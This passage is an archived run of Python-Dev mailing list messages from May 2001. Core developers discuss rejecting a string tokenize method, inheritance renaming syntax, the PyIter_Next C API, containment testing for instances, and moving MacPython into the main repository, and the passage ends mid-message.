Message-ID: <20010504141551.B1167@gerg.ca>

On 04 May 2001, M.-A. Lemburg said:
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
> 
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
> 
> I like this method -- should I review the code and then check it in ?

I concur with /F: -1 because you can do it easily with re.split().

        Greg
-- 
Greg Ward - Unix bigot                                  gward at python.net
http://starship.python.net/~gward/
I hope something GOOD came in the mail today so I have a REASON to live!!


From guido at digicool.com  Fri May  4 20:36:14 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:36:14 -0400
Subject: [Python-Dev] Multiple inheritance
In-Reply-To: Your message of "Fri, 04 May 2001 14:12:44 EDT."
             <20010504141244.A1167@gerg.ca> 
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>  
            <20010504141244.A1167@gerg.ca> 
Message-ID: <200105041836.f44IaEd29787@odiug.digicool.com>

> On 03 May 2001, Paul F. Dubois said:
> > 1. The simple case, X inherits from Y and in defining foo and bar needs to
> > use Y's version:
> > 
> > class X (Y rename foo as _sfoo,
> >                   bar as _sbar
> >         ):

[Greg Ward]
> Maybe I'm being thick, but don't you get the same effect by doing this:
> 
> class X (Y):
>     _sfoo = Y.foo
>     _sbar = Y.bar
> 
> ...or would the "rename" syntax also hide the "foo" and "bar" names from
> X's effective namespace[1]?  In that case, I guess some special syntax
> is needed.

Paul's point is that the rename thing makes it possible to deprecate
the form Y.foo, which is causing the basic ambiguity here.

> [1] "effective namespace" -- the union of X's class dict with all its
> superclass' dicts; not actually X's namespace, but the set of names you
> can use in X.  I think.  Err, whatever.

Probably irrelevant.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Fri May  4 20:38:06 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 14:38:06 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Fri, 04 May 2001 14:15:51 EDT."
             <20010504141551.B1167@gerg.ca> 
References: <3AF27088.DE495210@lemburg.com>  
            <20010504141551.B1167@gerg.ca> 
Message-ID: <200105041838.f44Ic6p29802@odiug.digicool.com>

> On 04 May 2001, M.-A. Lemburg said:
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> > 
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> > 
> > I like this method -- should I review the code and then check it in ?
> 
> I concur with /F: -1 because you can do it easily with re.split().

-1 also.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 20:51:26 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 14:51:26 -0400
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: <3AF27088.DE495210@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>

[MAL]
> Gustavo Niemeyer submitted a patch which adds a tokenize like
> method to strings and Unicode:
>
> "one, two and three".tokenize([",", "and"])
> -> ["one", " two ", "three"]
>
> I like this method -- should I review the code and then check it in ?

-1 here.  Easily enough done via other means, and you just *know* different
people will want different variants of tokenization (e.g., nobody in their
right mind will want " two " coming back from that example, and, given that
it does, that it doesn't also return " three" is baffling).

> PS: Haven't gotten any response regarding the .decode() method yet...
> should I take this as "no objections" ?

+1 from me:  it's the other half of the existing .encode() method, and the
current lack of symmetry is icky.


From barry at digicool.com  Fri May  4 20:57:09 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Fri, 4 May 2001 14:57:09 -0400
Subject: [Python-Dev] Multiple inheritance
References: <ADEOIFHFONCLEEPKCACCEEOCCIAA.paul@pfdubois.com>
	<20010503131714.D21814@inetnebr.com>
Message-ID: <15090.64389.746625.331215@anthem.wooz.org>

>>>>> "JE" == Jeff Epler <jepler at inetnebr.com> writes:

    >> class X (Y rename foo as _sfoo, bar as _sbar ):

    | Why not let us spell this as:
    | 	class X(Y):
    | 		from Y import foo as _sfoo, bar as _sbar
    | 		...

>>>>> "NS" == Neil Schemenauer <nas at python.ca> writes:

    NS> This already has a meaning in Python.  Paul's suggested syntax
    NS> is pretty neat, IMHO.

Not if Y is a class though, right?  That would currently raise an
ImportError, so why not hijack it for this purpose?  I think it has a
natural and clear enough meaning without requiring additional
keywords, or complicating the base class specification syntax.

-Barry


From tim.one at home.com  Fri May  4 22:50:03 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 16:50:03 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com>

In spare moments, I've been plugging away at making various functions work
nice with iterators (map, min, max, etc).

Over and over this requires writing code of the form:

	op2 = PyIter_Next(it);
	if (op2 == NULL) {
		/* StopIteration is *implied* by a NULL return from
		 * PyIter_Next() if PyErr_Occurred() is false.
		 */
		if (PyErr_Occurred()) {
			if (PyErr_ExceptionMatches(PyExc_StopIteration))
				PyErr_Clear();
			else
				goto Fail;
		}
		break;
	}

This is wordy, obscure, and in my experience is needed every time I call
PyIter_Next().

So I'd like to hide this in PyIter_Next instead, like so:

/* Return next item.
 * If an error occurs, return NULL and set *error=1.
 * If the iteration terminated normally, return NULL and set *error=0.
 * Else return the next object and set *error=0.
 */
PyObject *
PyIter_Next(PyObject *iter, int *error)
{
	PyObject *result;
	if (!PyIter_Check(iter)) {
		PyErr_Format(PyExc_TypeError,
			     "'%.100s' object is not an iterator",
			     iter->ob_type->tp_name);
		*error = 1;
		return NULL;
	}
	result = (*iter->ob_type->tp_iternext)(iter);
	*error = 0;
	if (result)
		return result;
	if (PyErr_Occurred()) {
		if (PyErr_ExceptionMatches(PyExc_StopIteration))
			PyErr_Clear();
		else
			*error = 1;
	}
	/* Else StopIteration is implicit, and there is no error. */
	return NULL;
}

Then *calls* could be the simpler:

	op2 = PyIter_Next(it, &error);
	if (op2 == NULL) {
		if {error)
			goto Fail;
		break;
	}

Objections?  So far I'm almost the only user of PyIter_Next(); the only other
use is in ceval's FOR_ITER, which goes thru a similar dance.

However, I'm not clear on why FOR_ITER doesn't clear the exception if
PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
true -- that sure smells like a bug (but, if so, the change above would
squash it by magic).

Note that I'm not proposing to change the signature of the tp_iternext slot
similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.


From guido at digicool.com  Sat May  5 00:03:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 17:03:36 -0500
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: Your message of "Fri, 04 May 2001 16:50:03 -0400."
             <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCEEFJKAAA.tim.one@home.com> 
Message-ID: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>

> In spare moments, I've been plugging away at making various functions work
> nice with iterators (map, min, max, etc).

For which efforts I extend my greatest thanks!

> Over and over this requires writing code of the form:
> 
[etc.]
> 
> This is wordy, obscure, and in my experience is needed every time I call
> PyIter_Next().
> 
> So I'd like to hide this in PyIter_Next instead, like so:
> 
> /* Return next item.
>  * If an error occurs, return NULL and set *error=1.
>  * If the iteration terminated normally, return NULL and set *error=0.
>  * Else return the next object and set *error=0.
>  */
> PyObject *
> PyIter_Next(PyObject *iter, int *error)
> {
[etc.]
> }

> Then *calls* could be the simpler:
> 
> 	op2 = PyIter_Next(it, &error);
> 	if (op2 == NULL) {
> 		if {error)
> 			goto Fail;
> 		break;
> 	}

I originally had this API for tp_iternext, and changed it to the
current API because I got tired of having to declare the error
variable.

How about making PyIter_Next() call PyErr_Clear() when the exception
is StopIteration?

Then calls could be

    op2 = PyIter_Next(it);
    if (op2 == NULL) {
        if (PyErr_Occurred())
            goto Fail;
        break;
    }

This is a tad slower and arguably generates more code (assuming an
extra call is slower than passing an extra argument and loading it)
but doesn't require declaring the error variable.

But since you're the customer, it's your choice.

> Objections?  So far I'm almost the only user of PyIter_Next(); the only other
> use is in ceval's FOR_ITER, which goes thru a similar dance.
> 
> However, I'm not clear on why FOR_ITER doesn't clear the exception if
> PyErr_Occurred() and PyErr_ExceptionMatches(PyExc_StopIteration) are both
> true -- that sure smells like a bug (but, if so, the change above would
> squash it by magic).

Smells like a bug indeed.

> Note that I'm not proposing to change the signature of the tp_iternext slot
> similarly.  PyIter_Next() is a (IMO appropriately) higher-level function.

Agreed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Fri May  4 23:18:16 2001
From: tim.one at home.com (Tim Peters)
Date: Fri, 4 May 2001 17:18:16 -0400
Subject: [Python-Dev] Change to PyIter_Next()?
In-Reply-To: <200105042203.RAA12278@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFMKAAA.tim.one@home.com>

[Tim]
>> In spare moments, I've been plugging away at ... iterators

[Guido]
> For which efforts I extend my greatest thanks!

Yet but a pale reflection of the thanks I extend to you for implementing
these guys to begin with:  they're *loads* of fun!  But not nearly as much
fun as playing with Perl, so they're still prudently Pythonic <wink>.

[T proposed adding a int* error arg to PyIter_Next()]

[G]
> How about making PyIter_Next() call PyErr_Clear() when the exception
> is StopIteration?
>
> Then calls could be
>
>     op2 = PyIter_Next(it);
>     if (op2 == NULL) {
>         if (PyErr_Occurred())
>             goto Fail;
>         break;
>     }

Perfect.  I'll do that later tonight, and update the PEP to match.

> This is a tad slower and arguably generates more code (assuming an
> extra call is slower than passing an extra argument and loading it)
> but doesn't require declaring the error variable.

Well, it's two more calls (since PyErr_Occurred() also makes a call to get
the thread state), but I don't really care because the client only does this
in case of error or end-of-iteration (which aren't the normal cases).  I was
dreading finding a spare int var to pass inside FOR_ITER anyway <wink>.


From paulp at ActiveState.com  Sat May  5 02:03:05 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Fri, 04 May 2001 17:03:05 -0700
Subject: [Python-Dev] ::
Message-ID: <3AF34339.9C553704@ActiveState.com>

I'll throw out a partially formed thought in case it is useful to
anybody.

"::" might be useful to solve another problem I've been struggling with:
how to have multiple package distributions share a namespace
(xml::dom::minidom, xml::dom::4dom, xml::dom::corbadom). 

"::" might mean, in general, that you are walking through abstract,
potentially merged namespaces and not through concrete dictionary
implementations. I think that Python's using the same syntax for package
namespaces and attribute accesses might seem more elegant than it is in
practice. Things that "seem like" they should work do not because
packages are fundamentally different than attributes:

>>> from xml import dom.minidom
  File "<stdin>", line 1
    from xml import dom.minidom
                       ^
SyntaxError: invalid syntax

Why isn't this symmetric? I would like to use "." on either side of the
import

>>> import xml
>>> print xml.dom
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
AttributeError: 'xml' module has no attribute 'dom'
>>> from xml.dom import minidom
>>> print xml.dom
<module 'xml.dom' from 'c:\program
files\python21\lib\xml\dom\__init__.pyc'>

I find it a little bit weird that importing one module has the side
effect of populating a package.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Sat May  5 05:07:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 04 May 2001 22:07:56 -0500
Subject: [Python-Dev] ::
In-Reply-To: Your message of "Fri, 04 May 2001 17:03:05 MST."
             <3AF34339.9C553704@ActiveState.com> 
References: <3AF34339.9C553704@ActiveState.com> 
Message-ID: <200105050307.WAA13735@cj20424-a.reston1.va.home.com>

> I find it a little bit weird that importing one module has the side
> effect of populating a package.

That's just because you've seen too much Java. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal at lemburg.com  Sat May  5 10:13:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Sat, 05 May 2001 10:13:30 +0200
Subject: [Python-Dev] "".tokenize() ?
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>
Message-ID: <3AF3B62A.50DD4115@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Gustavo Niemeyer submitted a patch which adds a tokenize like
> > method to strings and Unicode:
> >
> > "one, two and three".tokenize([",", "and"])
> > -> ["one", " two ", "three"]
> >
> > I like this method -- should I review the code and then check it in ?
> 
> -1 here.  Easily enough done via other means, and you just *know* different
> people will want different variants of tokenization (e.g., nobody in their
> right mind will want " two " coming back from that example, and, given that
> it does, that it doesn't also return " three" is baffling).

Ok. I rejected the patch with a mild response to take on this by
subclassing strings in Python 2.2 ;-)

> > PS: Haven't gotten any response regarding the .decode() method yet...
> > should I take this as "no objections" ?
> 
> +1 from me:  it's the other half of the existing .encode() method, and the
> current lack of symmetry is icky.

Right.

If I here no strong objections, I'll check in the .decode()
method next week.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Sat May  5 13:45:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 06:45:26 -0500
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: Your message of "Wed, 02 May 2001 21:55:25 +0200."
             <3AF0662D.48671B4E@lemburg.com> 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>  
            <3AF0662D.48671B4E@lemburg.com> 
Message-ID: <200105051145.GAA14831@cj20424-a.reston1.va.home.com>

> I've attached the patch. Due to a small reorganisation the
> patch is a little longer -- symmetry has its price at C level
> too ;-)

Looks good on paper, so go ahead and check it in.  Watch out for
potential changes caused by Tim's iter-crusade!  :-)

While you're at it, why don't you check in the rot13 codec you posted
-- it's good to have simle examples in the standard library.
It would also be cool to have codecs for common file encodings like
base64, quoted-printable, binhex, uuencode, and even hex
(binascii.hexlify).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:15:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:15:52 -0500
Subject: [Python-Dev] "".tokenize() ?
In-Reply-To: Your message of "Sat, 05 May 2001 10:13:30 +0200."
             <3AF3B62A.50DD4115@lemburg.com> 
References: <LNBBLJKPBEHFEDALKOLCIEFFKAAA.tim.one@home.com>  
            <3AF3B62A.50DD4115@lemburg.com> 
Message-ID: <200105051215.HAA14912@cj20424-a.reston1.va.home.com>

> Ok. I rejected the patch with a mild response to take on this by
> subclassing strings in Python 2.2 ;-)

Gustavo didn't take the rejection well.  He contacted me asking for a
better explanation, and we got into a bit of an argument about how
much I must explain my decisions, but I think hge understands now.

> If I here no strong objections, I'll check in the .decode()
> method next week.

Yes, see my previous reply.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Sat May  5 14:24:19 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 07:24:19 -0500
Subject: [Python-Dev] PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 03:06:20 MST."
             <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
References: <E14vyxA-0007lg-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>

In a checkin message, Tim wrote:
> The full story for instance objects is pretty much unexplainable, because
> instance_contains() tries its own flavor of iteration-based containment
> testing first, and PySequence_Contains doesn't get a chance at it unless
> instance_contains() blows up.  A consequence is that
>     some_complex_number in some_instance
> dies with a TypeError unless some_instance.__class__ defines __iter__ but
> does not define __getitem__.

This kind of thing happens everywhere -- instances always define all
slots but using the slots sometimes fails when the corresponding
__foo__ doesn't exist.  Decisions based on the presence or absence of
a slot are therefore in general not reliable; the only exception is
the decision to *call* the slot or not.  The correct solution is not
to catch AttributeError and pretend that the slot didn't exist (which
would mask an AttributeError occurring inside the __contains__ method
if there was one), but to reimplement the default behavior in the
instance slot implementation.

In this case, that means that PySequence_Contains() can be simplified
(no need to test for AttributeError), and instance_contains() should
fall back to a loop over iter(self) rather than trying to use
instance_item().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 22:40:11 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido at digicool.com  Sat May  5 23:48:33 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
             <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com> 
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:24:58 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido at digicool.com  Sun May  6 00:31:05 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
             <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com> 
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erronesouly assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Sat May  5 23:53:51 2001
From: tim.one at home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.


From paul at pfdubois.com  Sun May  6 03:10:37 2001
From: paul at pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicity defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.


From Greg.Wilson at baltimore.com  Sun May  6 18:26:00 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400 
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one at home.com  Sun May  6 20:15:57 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set


From jack at oratrix.nl  Mon May  7 11:39:43 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There's two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the filenamespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:45:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
of Python does not allow for an easy addition of a platform-dependent 
sourcefile to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform depende sourcefile has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack at oratrix.nl  Mon May  7 11:49:17 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) would have a search path for module sourcefiles. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules) not having 
